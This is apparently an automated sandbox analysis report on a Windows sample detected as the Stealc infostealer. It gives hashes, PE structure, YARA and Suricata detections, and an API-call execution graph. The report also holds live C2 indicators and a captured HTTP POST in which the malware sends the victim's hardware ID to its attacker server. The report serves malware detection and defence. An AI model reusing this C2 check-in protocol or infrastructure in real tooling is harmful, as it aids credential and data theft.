                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                No context
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 185.215.113.16
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.103
                WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.103
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.103
                WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
                No context
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.9472024442379405
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'846'784 bytes
                MD5:e904093ef887cb372b3fe7ab75e6c6c7
                SHA1:aece57bd3cbb0bc1818fe026100f30783a6e3f55
                SHA256:b99711aa1ee5a0ca9cfcc53dff0ffcab9f2800afad74a0633b1488fe2afa47b7
                SHA512:6876fa64ce5fc0f7a2b80368d2128b96262cf2dc9889bb2f5d3068c20dfd04f37fecd3095e941535cbc1de9be996411b3f617062f7364bf2ad28b404843dfd2d
                SSDEEP:49152:cusYocs8XFCmtRatofH5UIcOKO6KSRcIleAuFdJ:ck9s8XAuRy4H5CR9WoeAu
                TLSH:2B8533577D77EA39EDDF02FE0B77D529760039867ABD5002A11832D26119FE8F829438
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........
                Icon Hash:00928e8e8686b000
                Entrypoint:0xa97000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b
                Instruction
                jmp 00007F699880E83Ah
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                (unnamed) | 0x1000 | 0x25b000 | 0x22800 | 7943013b848e93da4b34df6db7191893 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (unnamed) | 0x25e000 | 0x29b000 | 0x200 | e5a29b04f6c072450b71528501588f8a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                bctajgqz | 0x4f9000 | 0x19d000 | 0x19ca00 | 01ce4d1addb5a847768d54ef091d1cb8 | False | 0.9949198632990003 | data | 7.953531786807203 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                phttshfa | 0x696000 | 0x1000 | 0x600 | 376cb0d862309905cdd0e82c11f276d2 | False | 0.556640625 | data | 4.918785667922125 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant | 0x697000 | 0x3000 | 0x2200 | 7d1c25521754e3871be1af956d8eb81a | False | 0.06410845588235294 | DOS executable (COM) | 0.7215987148621581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                kernel32.dll | lstrcpy
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-09-28T03:23:04.686587+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Sep 28, 2024 03:23:03.722526073 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                Sep 28, 2024 03:23:03.727597952 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                Sep 28, 2024 03:23:03.727861881 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                Sep 28, 2024 03:23:03.728097916 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                Sep 28, 2024 03:23:03.732861042 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                Sep 28, 2024 03:23:04.442666054 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                Sep 28, 2024 03:23:04.442723989 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                Sep 28, 2024 03:23:04.454196930 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                Sep 28, 2024 03:23:04.458985090 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                Sep 28, 2024 03:23:04.686531067 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                Sep 28, 2024 03:23:04.686587095 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                Sep 28, 2024 03:23:07.708157063 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | 7324 | C:\Users\user\Desktop\file.exe
                Timestamp | Bytes transferred | Direction | Data
                Sep 28, 2024 03:23:03.728097916 CEST | 89 | OUT | GET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Sep 28, 2024 03:23:04.442666054 CEST | 203 | IN | HTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:04 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Sep 28, 2024 03:23:04.454196930 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBK
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 42 31 36 36 33 42 38 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a
                Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="hwid"96B1663B80381806970752------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build"save------JKEGHDGHCGHDHJKFBFBK--
                Sep 28, 2024 03:23:04.686531067 CEST | 210 | IN | HTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:04 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=



                Target ID:1
                Start time:21:22:58
                Start date:27/09/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x920000
                File size:1'846'784 bytes
                MD5 hash:E904093EF887CB372B3FE7AB75E6C6C7
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1340711226.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true


                  Execution Graph

                  Execution Coverage:8.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:10.1%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
921670 lstrcpy 14253->14255 14254->14219 14255->14256 14256->13311 14257->14219 14258->14219 14260 937553 GetVolumeInformationA 14259->14260 14261 93754c 14259->14261 14262 937591 14260->14262 14261->14260 14263 9375fc GetProcessHeap RtlAllocateHeap 14262->14263 14264 937619 14263->14264 14265 937628 wsprintfA 14263->14265 14267 93a740 lstrcpy 14264->14267 14266 93a740 lstrcpy 14265->14266 14268 935da7 14266->14268 14267->14268 14268->13332 14270 93a7a0 lstrcpy 14269->14270 14271 924899 14270->14271 15321 9247b0 14271->15321 14273 9248a5 14274 93a740 lstrcpy 14273->14274 14275 9248d7 14274->14275 14276 93a740 lstrcpy 14275->14276 14277 9248e4 14276->14277 14278 93a740 lstrcpy 14277->14278 14279 9248f1 14278->14279 14280 93a740 lstrcpy 14279->14280 14281 9248fe 14280->14281 14282 93a740 lstrcpy 14281->14282 14283 92490b InternetOpenA StrCmpCA 14282->14283 14284 924944 14283->14284 14285 924ecb InternetCloseHandle 14284->14285 15327 938b60 14284->15327 14287 924ee8 14285->14287 15342 929ac0 CryptStringToBinaryA 14287->15342 14288 924963 15335 93a920 14288->15335 14291 924976 14293 93a8a0 lstrcpy 14291->14293 14299 92497f 14293->14299 14294 93a820 2 API calls 14295 924f05 14294->14295 14297 93a9b0 4 API calls 14295->14297 14296 924f27 codecvt 14301 93a7a0 lstrcpy 14296->14301 14298 924f1b 14297->14298 14300 93a8a0 lstrcpy 14298->14300 14302 93a9b0 4 API calls 14299->14302 14300->14296 14313 924f57 14301->14313 14303 9249a9 14302->14303 14304 93a8a0 lstrcpy 14303->14304 14305 9249b2 14304->14305 14306 93a9b0 4 API calls 14305->14306 14307 9249d1 14306->14307 14308 93a8a0 lstrcpy 14307->14308 14309 9249da 14308->14309 14310 93a920 3 API calls 14309->14310 14311 9249f8 14310->14311 14312 93a8a0 lstrcpy 14311->14312 14314 924a01 14312->14314 14313->13335 14315 93a9b0 4 API calls 14314->14315 14316 924a20 14315->14316 14317 93a8a0 lstrcpy 14316->14317 14318 924a29 14317->14318 14319 93a9b0 4 API calls 14318->14319 14320 924a48 14319->14320 14321 93a8a0 lstrcpy 14320->14321 
14322 924a51 14321->14322 14323 93a9b0 4 API calls 14322->14323 14324 924a7d 14323->14324 14325 93a920 3 API calls 14324->14325 14326 924a84 14325->14326 14327 93a8a0 lstrcpy 14326->14327 14328 924a8d 14327->14328 14329 924aa3 InternetConnectA 14328->14329 14329->14285 14330 924ad3 HttpOpenRequestA 14329->14330 14332 924b28 14330->14332 14333 924ebe InternetCloseHandle 14330->14333 14334 93a9b0 4 API calls 14332->14334 14333->14285 14335 924b3c 14334->14335 14336 93a8a0 lstrcpy 14335->14336 14337 924b45 14336->14337 14338 93a920 3 API calls 14337->14338 14339 924b63 14338->14339 14340 93a8a0 lstrcpy 14339->14340 14341 924b6c 14340->14341 14342 93a9b0 4 API calls 14341->14342 14343 924b8b 14342->14343 14344 93a8a0 lstrcpy 14343->14344 14345 924b94 14344->14345 14346 93a9b0 4 API calls 14345->14346 14347 924bb5 14346->14347 14348 93a8a0 lstrcpy 14347->14348 14349 924bbe 14348->14349 14350 93a9b0 4 API calls 14349->14350 14351 924bde 14350->14351 14352 93a8a0 lstrcpy 14351->14352 14353 924be7 14352->14353 14354 93a9b0 4 API calls 14353->14354 14355 924c06 14354->14355 14356 93a8a0 lstrcpy 14355->14356 14357 924c0f 14356->14357 14358 93a920 3 API calls 14357->14358 14359 924c2d 14358->14359 14360 93a8a0 lstrcpy 14359->14360 14361 924c36 14360->14361 14362 93a9b0 4 API calls 14361->14362 14363 924c55 14362->14363 14364 93a8a0 lstrcpy 14363->14364 14365 924c5e 14364->14365 14366 93a9b0 4 API calls 14365->14366 14367 924c7d 14366->14367 14368 93a8a0 lstrcpy 14367->14368 14369 924c86 14368->14369 14370 93a920 3 API calls 14369->14370 14371 924ca4 14370->14371 14372 93a8a0 lstrcpy 14371->14372 14373 924cad 14372->14373 14374 93a9b0 4 API calls 14373->14374 14375 924ccc 14374->14375 14376 93a8a0 lstrcpy 14375->14376 14377 924cd5 14376->14377 14378 93a9b0 4 API calls 14377->14378 14379 924cf6 14378->14379 14380 93a8a0 lstrcpy 14379->14380 14381 924cff 14380->14381 14382 93a9b0 4 API calls 14381->14382 14383 924d1f 14382->14383 14384 93a8a0 lstrcpy 14383->14384 14385 924d28 
14384->14385 14386 93a9b0 4 API calls 14385->14386 14387 924d47 14386->14387 14388 93a8a0 lstrcpy 14387->14388 14389 924d50 14388->14389 14390 93a920 3 API calls 14389->14390 14391 924d6e 14390->14391 14392 93a8a0 lstrcpy 14391->14392 14393 924d77 14392->14393 14394 93a740 lstrcpy 14393->14394 14395 924d92 14394->14395 14396 93a920 3 API calls 14395->14396 14397 924db3 14396->14397 14398 93a920 3 API calls 14397->14398 14399 924dba 14398->14399 14400 93a8a0 lstrcpy 14399->14400 14401 924dc6 14400->14401 14402 924de7 lstrlen 14401->14402 14403 924dfa 14402->14403 14404 924e03 lstrlen 14403->14404 15341 93aad0 14404->15341 14406 924e13 HttpSendRequestA 14407 924e32 InternetReadFile 14406->14407 14408 924e67 InternetCloseHandle 14407->14408 14413 924e5e 14407->14413 14410 93a800 14408->14410 14410->14333 14411 93a9b0 4 API calls 14411->14413 14412 93a8a0 lstrcpy 14412->14413 14413->14407 14413->14408 14413->14411 14413->14412 15348 93aad0 14414->15348 14416 9317c4 StrCmpCA 14417 9317cf ExitProcess 14416->14417 14429 9317d7 14416->14429 14418 9319c2 14418->13337 14419 931913 StrCmpCA 14419->14429 14420 931932 StrCmpCA 14420->14429 14421 9318f1 StrCmpCA 14421->14429 14422 931951 StrCmpCA 14422->14429 14423 931970 StrCmpCA 14423->14429 14424 93187f StrCmpCA 14424->14429 14425 93185d StrCmpCA 14425->14429 14426 9318cf StrCmpCA 14426->14429 14427 9318ad StrCmpCA 14427->14429 14428 93a820 lstrlen lstrcpy 14428->14429 14429->14418 14429->14419 14429->14420 14429->14421 14429->14422 14429->14423 14429->14424 14429->14425 14429->14426 14429->14427 14429->14428 14431 93a7a0 lstrcpy 14430->14431 14432 925979 14431->14432 14433 9247b0 2 API calls 14432->14433 14434 925985 14433->14434 14435 93a740 lstrcpy 14434->14435 14436 9259ba 14435->14436 14437 93a740 lstrcpy 14436->14437 14438 9259c7 14437->14438 14439 93a740 lstrcpy 14438->14439 14440 9259d4 14439->14440 14441 93a740 lstrcpy 14440->14441 14442 9259e1 14441->14442 14443 93a740 lstrcpy 14442->14443 14444 9259ee InternetOpenA 
StrCmpCA 14443->14444 14445 925a1d 14444->14445 14446 925fc3 InternetCloseHandle 14445->14446 14447 938b60 3 API calls 14445->14447 14448 925fe0 14446->14448 14449 925a3c 14447->14449 14451 929ac0 4 API calls 14448->14451 14450 93a920 3 API calls 14449->14450 14452 925a4f 14450->14452 14453 925fe6 14451->14453 14454 93a8a0 lstrcpy 14452->14454 14455 93a820 2 API calls 14453->14455 14457 92601f codecvt 14453->14457 14459 925a58 14454->14459 14456 925ffd 14455->14456 14458 93a9b0 4 API calls 14456->14458 14461 93a7a0 lstrcpy 14457->14461 14460 926013 14458->14460 14463 93a9b0 4 API calls 14459->14463 14462 93a8a0 lstrcpy 14460->14462 14471 92604f 14461->14471 14462->14457 14464 925a82 14463->14464 14465 93a8a0 lstrcpy 14464->14465 14466 925a8b 14465->14466 14467 93a9b0 4 API calls 14466->14467 14468 925aaa 14467->14468 14469 93a8a0 lstrcpy 14468->14469 14470 925ab3 14469->14470 14472 93a920 3 API calls 14470->14472 14471->13343 14473 925ad1 14472->14473 14474 93a8a0 lstrcpy 14473->14474 14475 925ada 14474->14475 14476 93a9b0 4 API calls 14475->14476 14477 925af9 14476->14477 14478 93a8a0 lstrcpy 14477->14478 14479 925b02 14478->14479 14480 93a9b0 4 API calls 14479->14480 14481 925b21 14480->14481 14482 93a8a0 lstrcpy 14481->14482 14483 925b2a 14482->14483 14484 93a9b0 4 API calls 14483->14484 14485 925b56 14484->14485 14486 93a920 3 API calls 14485->14486 14487 925b5d 14486->14487 14488 93a8a0 lstrcpy 14487->14488 14489 925b66 14488->14489 14490 925b7c InternetConnectA 14489->14490 14490->14446 14491 925bac HttpOpenRequestA 14490->14491 14493 925fb6 InternetCloseHandle 14491->14493 14494 925c0b 14491->14494 14493->14446 14495 93a9b0 4 API calls 14494->14495 14496 925c1f 14495->14496 14497 93a8a0 lstrcpy 14496->14497 14498 925c28 14497->14498 14499 93a920 3 API calls 14498->14499 14500 925c46 14499->14500 14501 93a8a0 lstrcpy 14500->14501 14502 925c4f 14501->14502 14503 93a9b0 4 API calls 14502->14503 14504 925c6e 14503->14504 14505 93a8a0 lstrcpy 14504->14505 14506 
925c77 14505->14506 14507 93a9b0 4 API calls 14506->14507 14508 925c98 14507->14508 14509 93a8a0 lstrcpy 14508->14509 14510 925ca1 14509->14510 14511 93a9b0 4 API calls 14510->14511 14512 925cc1 14511->14512 14513 93a8a0 lstrcpy 14512->14513 14514 925cca 14513->14514 14515 93a9b0 4 API calls 14514->14515 14516 925ce9 14515->14516 14517 93a8a0 lstrcpy 14516->14517 14518 925cf2 14517->14518 14519 93a920 3 API calls 14518->14519 14520 925d10 14519->14520 14521 93a8a0 lstrcpy 14520->14521 14522 925d19 14521->14522 14523 93a9b0 4 API calls 14522->14523 14524 925d38 14523->14524 14525 93a8a0 lstrcpy 14524->14525 14526 925d41 14525->14526 14527 93a9b0 4 API calls 14526->14527 14528 925d60 14527->14528 14529 93a8a0 lstrcpy 14528->14529 14530 925d69 14529->14530 14531 93a920 3 API calls 14530->14531 14532 925d87 14531->14532 14533 93a8a0 lstrcpy 14532->14533 14534 925d90 14533->14534 14535 93a9b0 4 API calls 14534->14535 14536 925daf 14535->14536 14537 93a8a0 lstrcpy 14536->14537 14538 925db8 14537->14538 14539 93a9b0 4 API calls 14538->14539 14540 925dd9 14539->14540 14541 93a8a0 lstrcpy 14540->14541 14542 925de2 14541->14542 14543 93a9b0 4 API calls 14542->14543 14544 925e02 14543->14544 14545 93a8a0 lstrcpy 14544->14545 14546 925e0b 14545->14546 14547 93a9b0 4 API calls 14546->14547 14548 925e2a 14547->14548 14549 93a8a0 lstrcpy 14548->14549 14550 925e33 14549->14550 14551 93a920 3 API calls 14550->14551 14552 925e54 14551->14552 14553 93a8a0 lstrcpy 14552->14553 14554 925e5d 14553->14554 14555 925e70 lstrlen 14554->14555 15349 93aad0 14555->15349 14557 925e81 lstrlen GetProcessHeap RtlAllocateHeap 15350 93aad0 14557->15350 14559 925eae lstrlen 14560 925ebe 14559->14560 14561 925ed7 lstrlen 14560->14561 14562 925ee7 14561->14562 14563 925ef0 lstrlen 14562->14563 14564 925f03 14563->14564 14565 925f1a lstrlen 14564->14565 15351 93aad0 14565->15351 14567 925f2a HttpSendRequestA 14568 925f35 InternetReadFile 14567->14568 14569 925f6a InternetCloseHandle 14568->14569 14573 
925f61 14568->14573 14569->14493 14571 93a9b0 4 API calls 14571->14573 14572 93a8a0 lstrcpy 14572->14573 14573->14568 14573->14569 14573->14571 14573->14572 14576 931077 14574->14576 14575 931151 14575->13345 14576->14575 14577 93a820 lstrlen lstrcpy 14576->14577 14577->14576 14579 930db7 14578->14579 14580 930f17 14579->14580 14581 930e27 StrCmpCA 14579->14581 14582 930e67 StrCmpCA 14579->14582 14583 930ea4 StrCmpCA 14579->14583 14584 93a820 lstrlen lstrcpy 14579->14584 14580->13353 14581->14579 14582->14579 14583->14579 14584->14579 14588 930f67 14585->14588 14586 931044 14586->13361 14587 930fb2 StrCmpCA 14587->14588 14588->14586 14588->14587 14589 93a820 lstrlen lstrcpy 14588->14589 14589->14588 14591 93a740 lstrcpy 14590->14591 14592 931a26 14591->14592 14593 93a9b0 4 API calls 14592->14593 14594 931a37 14593->14594 14595 93a8a0 lstrcpy 14594->14595 14596 931a40 14595->14596 14597 93a9b0 4 API calls 14596->14597 14598 931a5b 14597->14598 14599 93a8a0 lstrcpy 14598->14599 14600 931a64 14599->14600 14601 93a9b0 4 API calls 14600->14601 14602 931a7d 14601->14602 14603 93a8a0 lstrcpy 14602->14603 14604 931a86 14603->14604 14605 93a9b0 4 API calls 14604->14605 14606 931aa1 14605->14606 14607 93a8a0 lstrcpy 14606->14607 14608 931aaa 14607->14608 14609 93a9b0 4 API calls 14608->14609 14610 931ac3 14609->14610 14611 93a8a0 lstrcpy 14610->14611 14612 931acc 14611->14612 14613 93a9b0 4 API calls 14612->14613 14614 931ae7 14613->14614 14615 93a8a0 lstrcpy 14614->14615 14616 931af0 14615->14616 14617 93a9b0 4 API calls 14616->14617 14618 931b09 14617->14618 14619 93a8a0 lstrcpy 14618->14619 14620 931b12 14619->14620 14621 93a9b0 4 API calls 14620->14621 14622 931b2d 14621->14622 14623 93a8a0 lstrcpy 14622->14623 14624 931b36 14623->14624 14625 93a9b0 4 API calls 14624->14625 14626 931b4f 14625->14626 14627 93a8a0 lstrcpy 14626->14627 14628 931b58 14627->14628 14629 93a9b0 4 API calls 14628->14629 14630 931b76 14629->14630 14631 93a8a0 lstrcpy 14630->14631 14632 931b7f 
14631->14632 14633 937500 6 API calls 14632->14633 14634 931b96 14633->14634 14635 93a920 3 API calls 14634->14635 14636 931ba9 14635->14636 14637 93a8a0 lstrcpy 14636->14637 14638 931bb2 14637->14638 14639 93a9b0 4 API calls 14638->14639 14640 931bdc 14639->14640 14641 93a8a0 lstrcpy 14640->14641 14642 931be5 14641->14642 14643 93a9b0 4 API calls 14642->14643 14644 931c05 14643->14644 14645 93a8a0 lstrcpy 14644->14645 14646 931c0e 14645->14646 15352 937690 GetProcessHeap RtlAllocateHeap 14646->15352 14649 93a9b0 4 API calls 14650 931c2e 14649->14650 14651 93a8a0 lstrcpy 14650->14651 14652 931c37 14651->14652 14653 93a9b0 4 API calls 14652->14653 14654 931c56 14653->14654 14655 93a8a0 lstrcpy 14654->14655 14656 931c5f 14655->14656 14657 93a9b0 4 API calls 14656->14657 14658 931c80 14657->14658 14659 93a8a0 lstrcpy 14658->14659 14660 931c89 14659->14660 15359 9377c0 GetCurrentProcess IsWow64Process 14660->15359 14663 93a9b0 4 API calls 14664 931ca9 14663->14664 14665 93a8a0 lstrcpy 14664->14665 14666 931cb2 14665->14666 14667 93a9b0 4 API calls 14666->14667 14668 931cd1 14667->14668 14669 93a8a0 lstrcpy 14668->14669 14670 931cda 14669->14670 14671 93a9b0 4 API calls 14670->14671 14672 931cfb 14671->14672 14673 93a8a0 lstrcpy 14672->14673 14674 931d04 14673->14674 14675 937850 3 API calls 14674->14675 14676 931d14 14675->14676 14677 93a9b0 4 API calls 14676->14677 14678 931d24 14677->14678 14679 93a8a0 lstrcpy 14678->14679 14680 931d2d 14679->14680 14681 93a9b0 4 API calls 14680->14681 14682 931d4c 14681->14682 14683 93a8a0 lstrcpy 14682->14683 14684 931d55 14683->14684 14685 93a9b0 4 API calls 14684->14685 14686 931d75 14685->14686 14687 93a8a0 lstrcpy 14686->14687 14688 931d7e 14687->14688 14689 9378e0 3 API calls 14688->14689 14690 931d8e 14689->14690 14691 93a9b0 4 API calls 14690->14691 14692 931d9e 14691->14692 14693 93a8a0 lstrcpy 14692->14693 14694 931da7 14693->14694 14695 93a9b0 4 API calls 14694->14695 14696 931dc6 14695->14696 14697 93a8a0 lstrcpy 
14696->14697 14698 931dcf 14697->14698 14699 93a9b0 4 API calls 14698->14699 14700 931df0 14699->14700 14701 93a8a0 lstrcpy 14700->14701 14702 931df9 14701->14702 15361 937980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14702->15361 14705 93a9b0 4 API calls 14706 931e19 14705->14706 14707 93a8a0 lstrcpy 14706->14707 14708 931e22 14707->14708 14709 93a9b0 4 API calls 14708->14709 14710 931e41 14709->14710 14711 93a8a0 lstrcpy 14710->14711 14712 931e4a 14711->14712 14713 93a9b0 4 API calls 14712->14713 14714 931e6b 14713->14714 14715 93a8a0 lstrcpy 14714->14715 14716 931e74 14715->14716 15363 937a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14716->15363 14719 93a9b0 4 API calls 14720 931e94 14719->14720 14721 93a8a0 lstrcpy 14720->14721 14722 931e9d 14721->14722 14723 93a9b0 4 API calls 14722->14723 14724 931ebc 14723->14724 14725 93a8a0 lstrcpy 14724->14725 14726 931ec5 14725->14726 14727 93a9b0 4 API calls 14726->14727 14728 931ee5 14727->14728 14729 93a8a0 lstrcpy 14728->14729 14730 931eee 14729->14730 15366 937b00 GetUserDefaultLocaleName 14730->15366 14733 93a9b0 4 API calls 14734 931f0e 14733->14734 14735 93a8a0 lstrcpy 14734->14735 14736 931f17 14735->14736 14737 93a9b0 4 API calls 14736->14737 14738 931f36 14737->14738 14739 93a8a0 lstrcpy 14738->14739 14740 931f3f 14739->14740 14741 93a9b0 4 API calls 14740->14741 14742 931f60 14741->14742 14743 93a8a0 lstrcpy 14742->14743 14744 931f69 14743->14744 15370 937b90 14744->15370 14746 931f80 14747 93a920 3 API calls 14746->14747 14748 931f93 14747->14748 14749 93a8a0 lstrcpy 14748->14749 14750 931f9c 14749->14750 14751 93a9b0 4 API calls 14750->14751 14752 931fc6 14751->14752 14753 93a8a0 lstrcpy 14752->14753 14754 931fcf 14753->14754 14755 93a9b0 4 API calls 14754->14755 14756 931fef 14755->14756 14757 93a8a0 lstrcpy 